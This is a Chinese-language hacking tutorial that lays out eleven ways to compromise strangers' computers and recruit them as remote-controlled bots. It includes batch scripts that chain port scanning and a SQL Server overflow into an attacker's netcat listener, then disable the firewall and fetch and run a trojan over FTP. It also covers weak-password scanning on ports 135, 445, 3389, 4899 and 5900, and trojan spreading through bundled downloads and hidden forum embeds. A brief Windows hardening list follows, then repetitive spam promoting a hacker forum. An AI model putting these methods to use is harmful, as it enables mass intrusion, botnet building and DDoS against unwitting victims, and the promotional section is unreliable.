抓肉鸡的11种方法
首先得准备,免杀的STAT 或 一只免杀鸽子或者其他的远控,一个免费空间,一些工具(下面会提到)
(1)
扫3389端口抓肉鸡
(适合新手)(抓不了国外肉鸡)
现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。
(2)
扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)
(3)
扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
(4)
1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡
要用到的工具:S扫 sqlhello.exe nc.exe批处理文件
首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件
@echo off
for /f \"eol=; tokens=1,2 delims= \" %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f \"eol=; tokens=1 delims= \" %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口
然后再写个批处理
@echo off
Nc -l -vv -p 556nc.txt%0 这里的556要和上面的保持一致,你也可以改成其他的值,但是2处都要改,然后保存为nc.bat
然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。
这里给出一种代码
echo open X.X.X.X(你FTP的IP)daima.txt
echo usernamedaima.txt
echo passworddaima.txt
echo bindaima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)daima.txt
echo byedaima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
上面的步骤都搞好后,就可以开始扫肉鸡了。
先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。
忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。
先休息一下,打这么多字累死了
继续
(5)
扫1433抓肉鸡之方法2
要用到的工具:端口扫描器 X-scanSQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。
开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。
(6)
用WINNTAutoAttack扫SA弱口令抓肉鸡
工具:WINNTAutoAttack SQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。
(7)
扫4899空口令抓肉鸡
工具:端口扫描器 4899探测器 Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899
(8)
扫5900端口抓VNC肉鸡
工具:VNC扫描器 VNC连接器
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv
扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC
接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。
(9)
BT挂马
顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。
(10)
免费空间挂马
其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的
(11)
用RM在论坛挂马
首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性 ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。
如何防止黑客入侵2009-04-5 20:291、禁止IPC空连接
Cracker可以利用net use命令建立空连接,进而入侵,还有net view,nbtstat这些都是基于空连接的,禁止空连接就好了。打开注册表,找到Local_Machine\System\
CurrentControlSet\Control\
LSA-RestrictAnonymous 把这个值改成”1”即可。
2、禁止At命令
Cracker往往给你个木马然后让它运行,这时他就需要at命令了。打开管理工具-服务,禁用task scheduler服务即可。
3、关闭超级终端服务
如果你开了的话,这个漏洞都烂了,我不说了。
4、关闭SSDP Discover Service服务
这个服务主要用于启动家庭网络设备上的UPnP设备,服务同时会启动5000端口。可能造成DDOS攻击,让CPU使用达到100%,从而使计算机崩 溃。照理说没人会对个人机器费力去做DDOS,但这个使用过程中也非常的占用带宽,它会不断的向外界发送数据包,影响网络传输速率,所以还是关了好。
5、关闭Remote Registry服务
看看就知道了,允许远程修改注册表?除非你真的脑子进水了。
关于抓鸡技术
以下叙述内容全部是本人亲身体会的经验,如果对您有用,还请给我加点分,谢谢我和百度Hi上几个朋友还有寝室里的同学坚持每天都去【落雪黑客基地】抓鸡技术也很好, 他们的服务器的访问速度为0.7秒,抓鸡技术也很好,很快的速度,一定会让你们学的更开行
这个黑客网站的技术教程相当全面,工具非常多,更新速度很快技术也很高
他们是2010年最强大的黑马论坛,这个才出来的黑马技术站挺适合我和百度HI上朋友学习
现在即将暑假道来,本论坛即将开放暑假清凉会员教程集,保证您爽的透底
(只有信誉非常好的网站才有资格与IT业龙头公司合作的)抓鸡技术也很好,在里面可以学到安全防范技术,网站入侵检测技术,软件编程,软件破解,软件抓鸡修改,黑客攻击与防御等等诸多黑客攻防安全技术。抓鸡技术也很好,
论坛的热心高手也很多,让你真正零距离接触黑客,抓鸡技术也很好,(他们论坛里面完全免费)
他们论坛现在没有任何收费性质的教学方式,全部都是 免费的,菜鸟学习的好地方,所以我让你们来这里学习。抓鸡技术也很好,
善意的提醒:不要乱选择黑客网站,现在骗子站很多,一不小心可能还会使你电脑中病毒.
也不要随便拜师,个人名义收徒弟的99%都是骗子,谨防上当受骗! ,抓鸡技术也很好,请到落雪黑客联盟 里面有详细内容 ,抓鸡技术也很好,落雪黑客联盟长期更新免费使用,抓鸡技术也很好,落雪黑客联盟很多抓鸡高手,抓鸡抓鸡很多 我们可以在里面很多抓鸡抓鸡,抓鸡技术也很好,落雪黑客联盟专注于菜鸟的学习,可以说大家一般来学都学的会,不是笨蛋就可以了请在百度搜索 “落雪黑客联盟” 专业的黑客技术论坛.抓鸡技术也很好,以下叙述内容全部是本人亲身体会的经验,如果对您有用,还请给我加点分,谢谢a
最简单的方法就是使用软件入侵:首先,获得对方的IP,使用【流光IP扫描器】扫描对方电脑的端口漏洞。如果端口有漏洞的话,可以直接进行攻击控制电脑。如果电脑没有端口漏洞、接着我们就需要使用【啊D注入工具】,对对方电脑进行弱口令注入。再攻击。如果是为了纯粹抓鸡,不限制IP的话,可以使用3389端口扫描器或者灰鸽子。这种方法是傻瓜式的,有利有弊,虽然操作简单容易上手,但是会留下入侵痕迹。高手可以找到的。请慎用。
“抓鸡”是黑客界的一种流行语言.这里所说的"鸡",是指"电脑肉鸡".
这就是指拥有管理权限的远程电脑。也就是受别人控制的远程电脑(傀儡电脑)。"肉鸡"可以是各种系统,如2003,2000,2008,xp,win7,win8,linux,unix等;更可以是一家公司\企业\学校甚至是政府军队的服务器
黑客们经常用80,8080,135,445,1433,1521,3306,3389 ,4899,5900之类的端口来抓鸡。
肉鸡一般被黑客以不同的系统区分不同的价格批发给需要的人。
说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴、凤凰ABC、ghost、白金等等。
肉鸡不是吃的那种,是中了木马,或者留了后门,可以被远程操控的机器,现在许多人把有WEBSHELL 权限的机器也叫肉鸡。
谁都不希望自己的电脑被他人控制,但是很多人的电脑是几乎不设防的,很容易被远程攻击者完全控制。你的电脑就因此成为别人砧板上的肉,别人想怎么吃就怎么吃,肉鸡(机)一名由此而来。
通常情况下跟电脑网络连接的端口都存在有弱口令,这样就给黑客有可趁之机,通过工具扫描利用相应工具破解入侵这样你就成为黑客手中的“肉鸡”
他们这样的方式也就称之为“抓鸡”
黑客攻击就是首先要控制很多的电脑,一般他们都用灰鸽子、上兴控制别人电脑,俗称抓鸡,然后同时向网站或者游戏的服务器进行发送大量的访问请求,然后对方的带宽承受不了这么大的数据时就会被攻击瘫痪
攻击的目的:小黑客好奇,娱乐下。网站的竞争对手为了打击对方也会采用黑客攻击的方式。